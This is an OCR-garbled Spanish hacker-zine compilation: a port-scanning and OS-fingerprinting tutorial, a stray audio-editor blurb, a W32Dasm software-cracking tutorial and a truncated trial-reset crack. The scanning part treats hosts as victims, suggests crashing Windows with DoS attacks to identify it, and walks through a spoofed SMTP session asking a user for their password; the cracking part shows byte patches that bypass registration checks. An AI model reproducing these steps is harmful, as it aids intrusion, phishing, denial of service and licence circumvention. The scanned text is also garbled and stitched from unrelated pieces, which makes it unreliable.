Ventana (Window): este campo contiene un entero de 32 bits. Se utiliza 
para indicar el tama=o de buffer disponible que tiene el emisor para 
recibir datos. 


Opciones (Options): este campo permite que una aplicacion negocie 
durante la configuracion de la conexion caracteristicas como el tama=o 
maximo del segmento TCP. Si este campo tiene el primer octeto a cero, 
esto indica que no hay opciones. 


Relleno (Padding): este campo consiste en un numero de octetos (De uno 
a tres), que tienen valor cero y sirven para que la longitud de la 
cabecera sea divisible por cuatro. 


Checksum: mientras que el protocolo IP no tiene ningun mecanismo para 
garantizar la integridad de los datos, ya que solo comprueba la 

cabecera del mensaje, el TCP dispone de su propio metodo para garantizar 
dicha integridad. 


2. [ Que es el escaneo de puertos ? ] 


El escaneo de puertos consiste basicamente en detectar que servicios 
nos esta ofreciendo un determinado host. Si al hacer un escaneo 
encontramos un puerto abierto, segun cual fuese este es el servicio 
que nos ofrece. 


Por ejemplo vamos a escanear el host zapala.com.ar: 


Interesting ports on zapala.com.ar (200.32.91.1) 
Port State Service Protocol 

21 open tcp ftp 

25 open tcp smtp 

80 open tcp http 


Suponiendo que solo estos puertos estuvieran abiertos (HEH!) lo que nos 
resulta de este escaneo, es que zapala.com.ar esta ofreciendo servicios 

de transferencia de archivos, de correo y de web. 

Mas adelante veremos de que forma podemos explotar la informacion que 
hemos obtenido ahora. 


3. [ Diferentes tecnicas de escaneo de puertos ] 


Debido a los diferentes tipos de protocolos, los numerosos puertos que 
pueden estar escuchando, y a los dispositivos empleados para evitar o 
detectar el escaneo de puertos, han surgido diferentes tecnicas las 
cuales tienen sus ventajas como desventajas. A continuacion veremos 
algunas de las distintas tecnicas que hoy dia conocemos. 


- TCP connect() scanning: esta es la forma mas popular de escaneo TCP y 
consiste basicamente en usar la llamada a sistema connect() del sistema 
operativo, si se logra establecer la coneccion con el puerto de la otra 
computadora entonces este puerto esta abierto. Las ventajas que tiene 

esta forma de escaneo es que no se necesita ningun privilegio especial 
para poder llevarla a cabo, en la mayoria de los Unix cualquier usuario 
puede hacer uso de la llamada connect(). Otra gran ventaja es la 
velocidad. El lado negativo que encontramos es que es muy facil de 
detectar y de filtrar, y generalmente el host loguea que establecemos 

una coneccion e inmediatamente nos desconectamos. 


- TCP SYN scanning: esta tecnica es la llamada escaneo "half-open" (o 
mitad-abierta), porque no establecemos una coneccion TCP completa. Lo 
que hacemos es enviar un paquete SYN como si fueramos a entablar una 
coneccion TCP completa y esperamos por una respuesta. Podemos recibir 
un SYN|ACK si el puerto esta escuchando o un RST si el puerto esta 
cerrado. Si recibimos un SYN|ACK en respuesta, inmediatamente le 
enviamos un RST. La mayor ventaja de esta tecnica es que muy pocos 
servers nos loguean; y la desventaja es que se necesita privilegios de 

root para construir estos paquetes SYN a enviar. 


- TCP FIN scamning: algunos firewalls y packets filters escuchan por los 
paquetes SYN en algunos puertos, y programas como el synlogger puden 
detectar este tipo de escaneo. En cambio los paquetes FIN pueden penetrar 
sin mayor problemas. La idea consiste en que al enviar un paquete FIN 

si el puerto esta cerrado nos va a devolver un RST, y si el puerto esta 
abierto nos va a ignorar. Esto se debe a un error en las implementaciones 
TCP pero no funciona en un 100%. La mayoria de los sistemas parecen 
susceptibles excepto los sistemas Microsoft que son inmunes (aunque 
usted no lo crea). 


- Fragmentation scanning: esta no es una tecnica en si misma, sino una 
modificacion de otras tecnicas. Consiste en hacer una divicion de los 
paquetes que enviamos, para no ser detectados por los packet filters y 
los firewalls. Por ejemplo podemos hacer un SYN o un FIN scanning 
fragmentando los paquetes que enviamos, y al ir quedando en cola en los 
firewalls y en los packet filters no somos detectados. 


- TCP reverse ident scanning: el protocolo ident permite averiguar el 
nombre de usuario y el due-o de cualquier servicio corriendo dentro de 


una coneccion TCP. Por ejemplo podemos conectarnos al puerto http y 
usar identd para averiguar que esta corriendo la victima como root; esto 
solo es posible estableciendo una coneccion TCP completa. 


- FTP bounce attack: algo interesante del protocolo ftp, es que permite 

lo que se llama coneccion proxy ftp. Osea yo podria conectarme a un ftp 

desde un servidor proxy y al hacer esto establecer una coneccion y enviar 

un archivo a cualquier parte de la Internet. Esto lo podemos aprovechar 
tambien para hacer por ejemplo un escaneo TCP, ya que estariamos haciendolo 
desde un servidor ftp pero detras de un firewall. Lo bueno que tiene esta 
tecnica es obviamente que es muy dificil de rastrear, y lo malo es que 

puede volverse sumamente lento. 


- UDP ICMP port unreachable scanning: Lo que varia significativamente de 

esta tecnica con respecta a las otras es que estamos usando el protocolo 

UDP, este protocolo puede ser mas simple que el TCP pero al escanear se 

vuelve sumamente mas complejo; esto se debe a que si un puerto esta abierto 

no tiene que enviarnos un paquete de respuesta, y si un puerto esta cerrado 
tampoco tiene que enviarnos un paquete de error. Afortunadamente, la 

mayoria de los hosts nos envian un paquete de error "ICMP_PORT_UNREACH" 
cuando un puerto UDP esta cerrado. Esta tecnica suele volverse muy lenta. 


4, [ Averiguando el Sistema Operativo ] 


Saber que sistema operativo esta corriendo nuestra victima es algo 
obviamente muy valioso, ya que muchas de las vulnerabilidades que podemos 
encontrar dependen del sistema y la version que tenga. 


La forma mas efectiva de poder conocer que sistema corre nuestra victima 
seria hacerle un telnet. Suponiendo que el puerto 21 estuviera abierto 
veriamos algo asi: 


caos OCAOS- telnet afrodita.unrl.edu 
Trying 208.145.173.12... 

Connected to afrodita.unrl.edu. 
Escape character is '"]'. 


HP-UX hpux B.10.01 A 9000/715 (ttyp2) 
login: 


Como podemos ver al telnetear al host hpux.u-aizu.ac.jp nos aparece que 
sistema operativoy que version esta corriendo; y nos aparece un prompt 
pidiendonos los datos del login. Lamentablemente esta tecnica no es muy 
efectiva ya que el banner que nos muestra los datos del sistema es 
facilmente modificable; en los Linux solo basta con modificar los archivos 
/etc/issue y /etc/issue.net, por ejemplo al telnetear a mi computadora 
veriamos algo asi: 


H11111 CAOS - Ezkracho Team 
Hl-=- 
11111/1/ Feel the Power ! 


login: 


Pero el modificar los banners del login no afecta los banners defaults 
que vienen en los demas servicios; por ejemplo al telnetear a un ftp nos 
apareceria lo siguiente: 


caos OCAOS- telnet ftp.netscape.com 21 

Trying 207.200.74.26 ... 

Connected to ftp.netscape.com. 

Escape character is '"]'. 

220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready. 
SYST 

215 UNIX Type: L8 Version: SUNOS 


Otra truco que podemos utilizar si nuestra victima tiene montado un 
servidor web seria el siguiente: 


caos OCAOS- echo 'GET / HTTP/1.0w' | nc hotbot.com 80 | egrep '"Server:' 
Server: Microsoft-115/4.0 
caosOCAOS- 


Con lo que nos aparece creo que todos pueden deducir el sistema opreativo 
que esta corriendo. 


5. [ Fingerprinting ] 


El fingerprinting es basicamente determinar que sistema operativo corre 
una computadora, diferenciando las distintas respuestas que tiene un 
sistema a un pedido que hacemos. Asi comparando la respuesta de un 
sistema con respecto de otro, y de otro, podemos ubicar cual es el sistema 
que corre. Vale decir que el fingerprinting no es 100% seguro con ningun 
programa que utilisemos, pero segun cual fuese nos puede acercar lo 
suficiente como para ubicar el sistema, yo personalmente recomiendo el 
Nmap(www.insecure.org/nmap). A continuacion veremos las tecnicas mas 
representativas del fingerprinting que muchos programas utilizan: 


- El FIN probe: mandamos un paquete FIN, o cualquiera que no mande un 

flag SYN o ACK, a un puerto abierto y esperamos por una respuesta. Segun 

el RFC 793 no deberiamos obtener ninguna respuesta pero muchas malas 
implementaciones como el MS Windows, CISCO, BSDI HP/UX, MVS e IRIX 
mandan un RESET de respuesta. 


- El BOGUS flag probe: la idea es marcar un flag TCP indefinido (64 o 
128) en la cabezera de un paquete SYN. Algunos Linux anteriores al 
2.0.35 dejan marcado este flag en la respuesta; y algunos sistemas 
resetean la coneccion cuando reciben un paquete SYN+BOGUS. 


- TCP ISN sampling: la idea aqui es encontar patrones en el ISN(nitial 
Sequence Number) en aplicaciones TCP ante un pedido de coneccion. Osea 
hay distintos grupos de Sistemas Operativos que usan diferentes formas 

de generar los ISN, de esta manera podemos ubicar al sistema. 


- Don't fragment bit: muchos sistemas comienzan seteando el "Don't 
fragment" bit en el IP, en algunos de los paquetes que envian. Y muchos 
otros sistemas lo hacen pero solo en algunos casos. Osea que si vemos 
como va marcado este bit podemos obtener informacion interesante. 


- TCP initial window: aquí lo unico que hacemos es chequear el tama=o 
del window de los paquetes que nos devuelven. Algunos sistemas tienen 
un window unico, por lo que esta tecnica muchas veces es por la unica 
forma en que los podemos detectar. 


- ACK value: mas alla de que supongamos que el valor del ACK va a ser 
siempre estandar, en algunas implementaciones este valor varia. Por 

ejemplo supongamos que mandamos un FIN|PSHJURG a un puerto TCP cerrado, 
la mayoria de las implementaciones van a setear el ACK como el mismo 

numero de ISN que nosotros enviamos, pero no Windows claro, que manda 
nuestro ISN + 1. 


- ICMP error message quenching: esta tecnica consiste en ver la cantidad 
de menasjes de error que se nos devuelve ante un pedido. Muchos sistemas 
limitan la cantidad de mensajes de error usando un ratio por segundo o 
otros formulas. Esta tecnica no es muy usada porque se hace muy lento el 
tener que estar esperando a que nos devuelva los mensajes de error. 


- ICMP message quoting: segun los RFC los mensajes ICMP de error deben 
seguir una constante, sin embargo algunos sistemas no lo hacen asi y 

varian en las respuestas. Este es un gran punto con el cual podemos 
identificar algunos sistemas. 


- Exploit chronology: esta tecnica es muy divertida. Dado que no se 

puede distinguir entre el TCP stack de Windows 95, 98 y NT, porque no 

lo han actualizado en lo mas minimo, osea el NT sigue teniendo el mismo 
stack que el 95 y que el 98, surgio esta tecnica que todos seguramente 
hemos usado alguna vez. Consiste en hacer un ataque de DOS (Denial of 
Service) para tirar al Windows, podemos empezar con un Nuke, o un Ping 
de la Muerte, y luego vamos usando tecnicas un poco mas avanzadas como 
Teardrop y Land; entonces despues de cada ataque hacemos un PING a la 
victima y segun con que tecnica haya caido podemos deducir que sistema 
es y hasta que Service Pack o Hotfix tiene instalado. 


- SYN flood resistance: muchos sistemas paran de aceptar conexiones 
cuando uno les envia varios paquetes SYN; algunos solo aceptan 8 
paquetes. simplemente podemos determinar el sistema por la cantidad de 
paquetes que puede aceptar. 


6. [ Interpretando y explotando la informacion ] 


Solo veremos algunos de los puertos mas utiles para nuestro objetivo, 
los demas se los dejo para que los investiguen ustedes y usen su 
imaginacion. 

Lo que aqui haremos en definitiva es tratar de averiguar las versiones 
de los demonios que esta corriendo el sistema, para encontrar algun 
bug de esa version y su respectivo exploit. Tambien veremos algunos 
puertos que nos pueden brindar datos interesantes. 


Interesting ports on zapala.com.ar (200.32.91.1) 
Port State Service Protocol 

21 open tcp ftp 

25 open tcp smtp 

79 open tcp finger 

80 open tcp http 


- Puerto 21: yo lo primero que provaria es intentar hacer un ftp 
anonimo, muchos sistemas estan tan mal configurados que hasta 
podriamos conseguir el archivo de password. Luego tendriamos que 
intentar ver que version del demonio ftp esta corriendo, seria 

algo asi: 


caos OCAOS- telnet ftp.zapala.com.ar 21 

Trying 200.32.91.1 ... 

Connected to ftp.zapala.com.ar. 

Escape character is '1]'. 

220 ftp.zapala.com.ar FTP server (Version wu-2.5.0(1) Tue Sep 21 
16:48:12 EDT 1999) ready. 


Aqui vemos que version del FTP server esta corriendo el host, que 
no hace falta decir lo famoso que es por sus innumerables bugs, 
ahora lo que hacemos es buscar el exploit para esa version. 


- Puerto 25: en este puerto generalmente encontraremos el servidor 
de correo; si es el sendmail u otro, telneteamos a este puerto y 

vemos cual es la version, y por supuesto vemos si podemos encontrar 
algun exploit que nos sirva. 


Para lo que tambien nos puede ser util este puerto es para enviar 
mails anonimos o fake mails. Por ejemplo nos podriamos hacer pasar 
por el Administrador del sistema y pedirle que nos envie su 
contrase-a: 


telnet universidad.edu.ar 25 

220 universidad.edu.ar Microsoft Sendmail 1.0 ready at Sat, 2-1-98 
HELO CAOS 

250 <universidad.edu.ar> Hello CAOS 

MAIL FROM: administradorOuniversidad.edu.ar 

250 <administradorOuniversidad.edu.ar> ...Sender OKay 
RCTP TO: victima Ouniversidad.edu.ar 

250 <victimaOuniversidad.edu.ar> ...Recipient OKay 

DATA 

354 Enter mail, end with "." on a line by itself 

Estimado usuario, debido a una reestructuracion del sistema 
necesitamos nos envie su contrase-a para agregarla a la nueva 
base de datos. Muchas gracias y disculpe las molestias. 

El Administrador. 


250 Mail accepted 
QUIT 
221 universidad.edu.ar closing connection. 


Este ejemplo es muy inocente pero todo esta en la imaginacion 
de cada uno. Algo a tener en cuenta es que muchos servidores de 
correo loguean nuestra direccion IP y puede aparecer en el mail 
que enviamos, por eso es preferible primero enviarnos un mail a 
nosotros mismos para ver si aparece nuestra IP. 


- Puerto 79: en este puerto podemos encontrar importante 
informacion sobre los usuarios que se encuentran en el sistema. 
Por ejemplo podemos probar hacer algo como esto: 


telnet ¡perez victima.edu.ar 79 


Login Name Tty Idle Login Time Office Office Phone 
jperez Juan Perez 1 Feb 7 02:06 4785-6548 


Y obtendriamos informacion personal de ese usuario como ser su 
telefono, que podriamos utilizar para hacer Ingenieria social. 


Ahora si queremos ver todos los usuarios que hay en un sistema en 
algunos servidores podemos hacer esto: 


telnet Evictima.edu.ar 79 


Login Name Tty Idle Login Time Office Office Phone 
jperez Juan Perez 1 Feb 7 02:06 4785-6548 
root root *2 4:28 Feb 7 02:05 


Y como vemos obtenemos todos los usuarios que en ese momento se 
encuentran logueados en el sistema. 


- Puerto 80: este puerto es el que nos ofrece el servicio de 

web. Podriamos utilizarlo para conseguir el archivo de password 
mediante la tecnica del PHFE, pero como esta tecnica ya esta 
quedando obsoleta no mencionare como hacerlo. Todo depende de 
lo actualizado que estemos en los bugs que dia a dia aparecen, 

hoy si este host estuviera corriendo el servidor web de Microsoft 
podriamos probar la vulnerabilidad del ISS que afecta al 90% de 
los servidores web existentes en Internet, o como ya hemos visto 
antes podriamos usarlo para obtener informacion del sistema. 


7. [ Acerca del Ezkracho Team ] 


Puedo definir al Ezkracho Team como un grupo de Seguridad e 
Inseguridad Informatica. Este grupo surgio en un principio por 
el simple hecho de querer compartir conocimientos e ideas, con 
quienes nos dimos cuenta teniamos las mismas curiosidades y 
ansias de saber; mas adelante al empezar a organizarnos 
surgimos por la necesidad de una propuesta seria entre las 
pocas que hay en lo que es la seguridad informatica. 


En lo que es hoy el Ezkracho Team tenemos muchos proyectos que 
estamos llevando adelante, y muchos ideas para muchos mas; 
tambien estamos comenzando grandes proyectos con otros grupos 
que con el tiempo van a salir a la luz. 


Los miembros actuales del Ezkracho Team son: 
CAOS (osea yo), Powertech, Giba, Bach y [Hellraiser] 


El Ezkracho Team es un grupo cerrado por lo que no se aceptan 
nuevos miembros, pero siempre es bienvenido cualquier tipo de 
colaboracion. 


8. [ Contacto ] 


Sí me queres contactar por cualquier cosa que se te ocurra, como 
tambien a los demas miembros de Eskracho nuestras direcciones de 
mail son estas: 


CAOS ezkracho O hotmail.com <---- este soy yo ;) 
Powertech powertechEmixmail.com 

Bach bach Olacasilla.com.ar 

Giba gibaClacasilla.com.ar 

[Hellraiser] askhell ciudad.com.ar 


Si queres ver mas trabajos de mi autoria como de todo el Ezkracho 
Team, lo podes hacer en nuestro website. 

NOTA: debido a que actualmente estamos registrando nuestro dominio 
y estamos cambiando de server nos podes encontrar en estas URL's. 


ezkracho.piratas.org 
www.ezkracho.com 
www.ezkracho.com.ar 
www.ezkrachoteam.com.ar 


Tambien podes encontrar todo nuestro material y mucho mas en el 
Ezkracho BBS, pero por razones operativas busca el numero de 
telefono y los horarios que esta online en la web. 


- EOT - Hasta la proxima, CAOS. 


Este programa permite la edición y conversión de archivos de audio de una forma muy sencilla. 


Con AudioEdit Deluxe podés abrir, crear y guardar archivos en cualquiera de los formatos que 
soporta, Ver la forma de audio de la onda (zoom in, zoom out, zoom vertical, zoom full), también 
podés reproducir cualquier audio o una parte de el, grabar con tu micrófono o por la entrada de 
línea (line in). 


Tiene funciones para editar los archivos como cortar, copiar, borrar, insertar silencios, pegar 
desde otro archivo, mezclar, y más. Además podés aplicar varios efectos como delay, ecualizador, 
fade in, fade out, flanger, reverse, invert, reverb, normalize, vibrato y un montón más. 


A AudioE dl Delure - [Sting] - A Thouzand 


Ele Edt Command Help 
Jénegtr¡|0iBAx3s3|* 
EE di Al 


Tutorial sobre W32Dasm 


Bueno, empiezo aqui mi segundo tutorial, este va ha ser sobre el uso y abuso 
del W32Dasm Version 8.93 (la que hay en todas partes). 


Decir que no todos los archivos se pueden desensamblar y ultimamente casi 
ninguno, la mayoria usan compresores de ejecutables, pero tranquilidad 

que lo unico que hay que hacer es descomprimirlo. ¿Que como descomprimirlo?, 
eso es otro tema que habra que tratar en otro tutorial, todavia hay muchos 

que no usan compresores y ademas podeis conseguir versiones antiguas de los 
programas en cualquier pagina de ShareWare, yo uso como ejemplo el GetRight 
porque todas las versiones que he visto son parecidas y se pueden 

desensamblar sin ningun problema (el uso del W32Dasm es igual en todos los 
programas nuevos y antiguos y hay que saber utilizarlo porque es 

indispensable para muchas cosas). 


Empecemos por el principio, abrimos el programa y lo configuramos, la unica 
configuracion para usar el desensamblador es entrar en, 
"Disassembler/Disassembler Options” y cerciorarnos de que estan seleccionadas 
todas las opciones, las opciones se refieren a los saltos condicionales, 

saltos incondicionales y call's, nosotros queremos ver toda esta informacion 

que consiste en las referencias de los saltos, por ejemplo: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0044240E(C), :00442469(C) 


* Possible Reference to String Resource ID=00123: "Invalid registration code" 


:00442474 6A7B push 0000007B 
:00442476 57 push edi 
:00442477 E803350100 call 0045597F 


Aqui vemos claramente para que sirven estas funciones, a nosotros nos 
interesa saber de donde saltan hasta aqui porque seguro que cerca de ese 
salto hay otro a "Thank You" o algo asi o simplemente nos puede valer 
anulando el salto. 


Aqui hay dos direcciones desde las que llegamos hasta aqui, 44240E(C) y 
442469(C), las (C) quieren decir que el salto es (C)ondicional o 
(U)jncondicional (Ya se que seria (Incondicional pero como vamos a ver una U 
porque es en ingles y no creo que a nadie le moleste la gramatica lo pongo 

asi), y olvidandonos de estas innecesarias explicaciones y ya configuradas 

las opciones empecemos a trabajar:) 


El programa en si es facil de usar, lo vereis en los ejemplos y en los 
programas que destripeis, la cosa es saber que buscar. 


Antes que nada explicar el uso de las teclas que en muchos tutoriales se 
olvida y luego hay que ingeniarselas para averiguar el funcionamiento, lo 
primero es moverse por el codigo que como os podreis imaginar se hace con 
las Flechas arriba y abajo, cuando estemos sobre alguna instruncion de salto 
o encima de algun Call veremos que el marcador cambia de color, estando 


situado sobre la instruccion podemos darle a la flecha de derecha y se 
ejecutara el salto o el Call, en el call pasariamos a la primera instruccion 

del mismo. Ahora bien, lo contrario tambien lo podremos hacer pero no es 
igual para los saltos y los Call, en los Call bastara con la flecha izquierda 
para volver a la direccion del Call estemos donde estemos volveremos a la 
direccion del ultimo Call que hallamos ejecutado, en los saltos tendremos que 
mantener pulsada la tecla CTRL al pulsar la flecha izquierda. 


Aclarar que para invertir un salto o un call, es decir para volver a la 
instruccion que habiamos ejecutado primero hay que ejecutarla, y aunque 
parece una tonteria no lo es tanto, seguro que mas de un impaciente que sin 
terminar de leer se a puesto a probar ya ha matxakado la tecla porque no hace 
lo que le pide. 


Otra aclaracion antes de empezar, la funcion Search/Find Text es para buscar 
texto (ya oigo las risas de mas de uno), aqui solo ahi que tener cuidado 

en saber donde estamos al usar esta funcion, puedes elegir arriba o abajo 

lo que quiere decir que busca desde la posicion que tenemos marcada (la que 
vemos en la pantalla) hacia arriba o hacia abajo. Asi que si estamos por la 
mitad del codigo y buscamos un texto, no lo encontrara si este esta mas 
arriba de nuestra posicion y tenemos marcada la opcion abajo. 


La funcion Goto/Goto Code Location sera otra de las funciones que usemos, 
esta sirve para ir a la direccion exacta que queramos (por ejemplo una 
direccion que hallamos encontrado con el SICE). 


Empezamos a trabajar con el programa 


Lo que nos interesa a nosotros son las cadenas de texto del programa que 
destripemos al estilo del ejemplo anterior del Getright (3.34 creo) pero 
todas las versiones de este programa sirven (por lo menos hasta la 4.1), 
estas referencias las encontraremos en: 


Refs/String Data References Aqui veremos casi siempre lo que nos interesa. 


La busqueda de las String Data References debe empezar en el programa en si, 
debemos ejecutar el programa y apuntar en un papel todas las cadenas de texto 
que nos puedan servir de guia, la mayoria de las veces el el menu About o 
Acerca nos dan directamente las cadenas. Tenemos un 90% de posibilidades que 
en este menu ponga algo asi: 


Registered To: Unregistered Version 
O tambien otra muy clasica seria la de: 
Evaluation Version 


Veamos cual es la nuestra, vamos al programa menu Help/About y nos 
encontramos esto: 


** UNREGISTERED TRIAL VERSION ***, 


Lo buscamos con search Text, ponemos UNREGIS le damos a buscar y no 
encontramos, y ahora alguien pregunta ¿pero no decias que las cadenas de 
texto tienen que estar por ahi?- Pues no siempre como se puede comprobar aqui 
pero siempre nos dan pistas, si el programa nos dice unregistered cuando 

no estamos registrados ¿Que nos dira cuando si lo estemos? 


Si eso es Registered normalmente seguido por user, version, To:, etc... Ha 
que no hacia falta exprimirse el cerebro ehh?. 


Buscamos Registered y BINGO!!!, encontramos Registered Version y tambien 
You must be registered, la que a nosotros nos interesa es registered version 

asi que de la otra pasamos, pero hay muchos registered version, no os 
preocupeis, empecemos por el primero. 


:00401621 E884C20300 call 0043D8AA ¿Comprueba registro 
:00401626 85C0 test eax, eax ¿Estas registrado? 
:00401628 7443 je 0040166D ¡Si es que NO salta 


* Possible Reference to String Resource ID=00327: "Registered Version." 


:0040162A 6847010000 push 00000147 ¡Si es que si 
:0040162F 8D4DF0 lea ecx, dword ptr [ebp-10] 
:00401632 E85E1C0800 call 00483295 


Bien una vez visto esto tratemos de explicarlo, en el Call mira haber si 

somos usuarios registrados, si no lo somos nos devuelve en EAX un 0 y si 
estamos registrados un valor diferente de O, luego un TEST EAX,EAX que hace 
una AND entre EAX y EAX lo que quiere decir que encenderan el flag Z solo 

si es O, es una comprobacion tipica en todos los programas ya que ocupa 

mucho menos que un CMP EAX,00 , el JE xxxxxx es un salto si es igual, tambien 
podria ser un JZ salto si esta encendido el Flag Z que se enciende cuando el 
resultado de una operacion es O. Bueno a estas alturas el programa ya ha 
decidido si somos usuarios registrados o no, aunque le podemos convencer de 
lo contrario, vamos al editor Hexadecimal y cambiamos los BYTEs 7443 del 
salto por 9090 que seria NOP, NOP, y asi el programa siempre pasaria hacia 
registered. Las direcciones en el editor hexadecimal son diferentes a las que 
vemos en el W32Dasm pero tiene en la parte de abajo de la patalla una linea 

en la que al final antes de llegar al nombre del archivo que tenemos 
desensamblado pone Offset 0O000A28, el offset que aparece aqui es el que 
tendremos que bucar en el editor hexadecimal, teniendo este configurado con 
direcciones en hexadecimal. 


Antes de hacer ninguna modificacion al ejecutable hay que hacer una copia del 
original y guardarla por si acaso algo va mal poder volver atras sin 
necesidad de desinstalar y volver a instalar el programa. 


Los que hallais probado haber si funciona vereis que al ir a la ventana 
About en vez de poner *** UNREGISTERED... ahora pone Registered Version. 


Bueno en realidad esto no a servido para nada porque lo unico que hemos 
conseguido es que nos diga que estamos registrados pero eso no quiere decir 
que lo estemos en realidad, pero no os desanimeis que no a sido en balde todo 
el trabajo. Este metodo suele servir para muchos programas que su ventana 


principal pone NOMBRE PROGRAMA version UNREG porque tienen algo asi como dos 
versiones del programa una registrada y otra no. En estos programas con hacer 

lo que hemos hecho antes y entrar en la version registrada suele ser 

suficiente, y hay muchosss de estos. 


Otra manera de conseguir algo. 


Je, seguimos con el programilla, otra manera de atacar al programa es en el 
Call de comprobacion. 


:00401621 E884C20300 call 0043D8AA ¿Comprueba registro 
:00401626 85C0 test eax, eax ¿Estas registrado? 
:00401628 7443 je 0040166D ¡Si es que NO salta 


* Possible Reference to String Resource ID=00327: "Registered Version." 


:0040162A 6847010000 push 00000147 ¡S1 es que si 
:0040162F 8D4DF0 lea ecx, dword ptr [ebp-10] 
:00401632 E85E1C0800 call 00483295 


Esto era lo que teniamos y el Call que queremos investigar es el Call 43D8AA 
antes de nada hay que restaurar los BYTES que hallamos cambiado porque si no 
el W32Dasm no fucionara al abrir el proyecto lo mismo que si borramos el 
ejecutable, para que funcione bien tiene que estar el archivo que hallamos 
desensamblado exactamente como estaba al desensamblarlo, siguiendo conel call 
le damos a la flecha derecha para ver el contenido y aparecemos aqui: 


* Referenced by a CALL at Addresses: 

1:00401621 ,:00401CF8 ,:0040742F ,:004088CD , :0040C041 
1:004103AD ,:00417CEO ,:004188EA ,:00419C75 ,:0041CB9B 
1:004285B6 ,:0042A04C ,:0042A719 ,:0042ABA7 ,:0042ADBD 
1:0042D8B2 ,:0042EAE6 ,:00431FFD ,:00434663 , :00435038 
1:00442426 ,:00443848 ,:0045368C ,:00453813 ,:0045550E 
1:00454207 ,:00464BF8 ,:0046820E 


:0043D8AA 55 push ebp Z 

:0043D8AB 8BEC mov ebp, esp ¡Guarda los datos que 
:0043D8AD 83EC14 sub esp, 00000014  ;tenia en los 
:0043D8B0 53 push ebx ¡reg1stros 

:0043D8B 1 57 push edi : 


* Possible Reference to Menu: MenuID_0001 


:0043D8B2 6A01 push 00000001 

:0043D8B4 8BD9 mov ebx, ecx 

:0043D8B6 5F pop edi 

:0043D8B7 897DF8 mov dword ptr [ebp-08], edi 
:0043D8BA E8C3FC0300 call 0047D582 
:0043D8BF 8BCB mov ecx, ebx 

:0043D8C1 E873FC0300 call 0047D539 


:0043D8C6 8B03 mov eax, dword ptr [ebx] 


:0043D8C8 8378F80C cmp dword ptr [eax-08], 0000000C 


:0043D8CC 7407 je 0043D8D5 ¡Sigue comprobando 
:0043D8CE 33C0 xor eax, eax ¿No estas registrado 
:0043D8D0 E9D9040000 jmp 0043DDAE ¡Va hacia el Ret 


Aqui vemos que este Call esta muy solicitado, ¿Seran todas las veces que el 
programa comprueba si estamos registrados?, Despues de guardar los registros 
vemos algunas instrucciones un par de Calls seguramente para coger el N* de 
serie y despues hacer las comprobaciones, y parece que si porque despues el 
MOV EAX,DWORD PTR [ebx] parece que mueve la direccion en memoria del serial 
y comprueba si la direccion-08 es 0C, (normalmente los programas cuando 
guardan el serial guardan tambien el n? de BYTES que tiene 8 bytes antes del 
inicio del serial, esto no tiene por que ser asi pero lo vereis muchas veces) 
comprueba si la longitud del serial es 12=0Ch, esto es todo deduccion, no 
tiene porque ser asi aunque es mas que probable que asi sea, si no es OC 
ponemos EAX a O con XOR EAX,EAX y saltamos con JMP 43DDAE a: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0043D8D0(U) 


:0043DDAE 5F pop edi 
:0043DDAF 5B pop ebx 
:0043DDBO0 C9 leave 
:0043DDB1 C3 ret 


Con lo que volvemos al programa con O en EAX lo que es igual a no estar 
registrado, si seguimos por el JE veremos mas comprobaciones, este seria el 
camino a seguir con SICE para encontrar un serial valido. 


A nosotros no nos interesa la comprobacion y demas asi que pensamos un poco 
como podriamos hacer para que no nos devuelva un O sino un valor distinto de 
0. Despues de abrir las ventanas para que se disipe el humo que nos sale por 
las orejas vemos claramente el camino (una cosa es saber que hacer y otra 

cosa es saber como hacerlo y si se puede hacer). Como a todos se os a 

ocurrido la solucion seria que el programa no siga la comprobacion y que en 
vez de poner EAX a 0 lo ponga a 1. 


¿Sabemos que queremos hacer pero no sabemos como?, tranquilos que esto es 
facil vamos mirando y vemos que para hacer lo que queremos podemos usar los 
bytes del salto ya que tenemos que eliminarlo y los bytes del XOR EAX,EAX 
porque lo que queremos es lo contrario, que EAX no sea 0, en total tenemos 

4 bytes (en realidad podemos usar mas como los del CMP pero supongamos que 
solo son 4 para exprimir mas nuestros cerebros). 


Con 4 bytes tendremos que descartar un MOV EAX,01 ya que necesitariamos 
5 bytes para poner B8301000000 que seria el mov eax,01 , si os preguntais 
como saber que bytes son mov eax,01 la respuesta es probarlo el SICE o la 
experiencia. 


Llegamos a lo que seria la solucion generica para resolver este tipo de 
dilemas, y la solucion que nos servira casi siempre que es: 


PUSH 01 ¡pasamos 01 a la pila 


POP EAX ¿sacamos el 01 de la pila a EAX, y la pila queda tal y como 
:estaba antes 


Esto nos daria una cosa tal que asi 6A01 para Push 01 y 58 para POP EAX, 
antes de cambiar hay que fijarse cunatos bytes vamos a usar, si modificamos 
estos tres bytes, nos quedaria 1 sin cambiar que tendremos que rellenar con 
un NOP (90) para que no se alteren el resto de las instrucciones. 


Bien apuntemos la direccion para el editor hexadecimal 3CCCCH y apuntamos 
tambien los bytes no valla a ser que nos confundamos 7407330C. 


¿Que tal os ha ido la prueba, parece que funciona, ehh?. No os fieis y 
comprobad que funcione perfectamente, un crack que no funciona a la 
perfeccion es una txapuza. (Este no funciona asin que a seguir probando, 
si lo consigues felicidades y si no seguro que has aprendido bastante). 


Una manera mas de entrarle al tema 


Otra manera son las funciones del windows (de las DLLs del windows), en el 
W32dasm tenemos el menu Functions/Imports que nos muestra las funciones que 
usa el programa aqui podemos cazar cosas como accesos al registro de Windows 
RegQueryValueExA y mas, comprobaciones de fechas con GetLocalTime o 
GetSystemTime. 


Esto de las funciones nos servira mas para saber que breakpoints poner en el 
SICE que para trabajar con ellos en el W32Dasm pero no podia explicar el uso 
de este maravilloso programa sin comentar lo de las funciones. 


Si quieres saber mas cosas sobre el W32Dasm leete su ayuda:) 


Voy a dar esto por terminado que ya basta de escribir, espero que os sirva 
para algo esta pequeña explicacion. Aunque ya hay bastante material en 
castellano y muy bueno asi contribuimos a que esto krezka (en cuanto a 
material didactico). 


Paginas interesantes: 


http://personal2.redestb.es/karpoff/ ¡Muy buena y muy completa la pagina 
¿de Karpof, ademas encontraras el 
¡link al ECD ¡¡¡bajatelo YAAA!!!. 


Si tienes alguna duda: JoTaKeOiname.com 


JoTaKe 


Crack Paint shop pro 7.04 £ Animator 3.04 


Al agregar esta dirección en le registro 


se inicia el conteo desde cero del periodo prueba incluyendo 
Paint shop pro 7.04 £ Animator 3.04 


REGEDIT4 


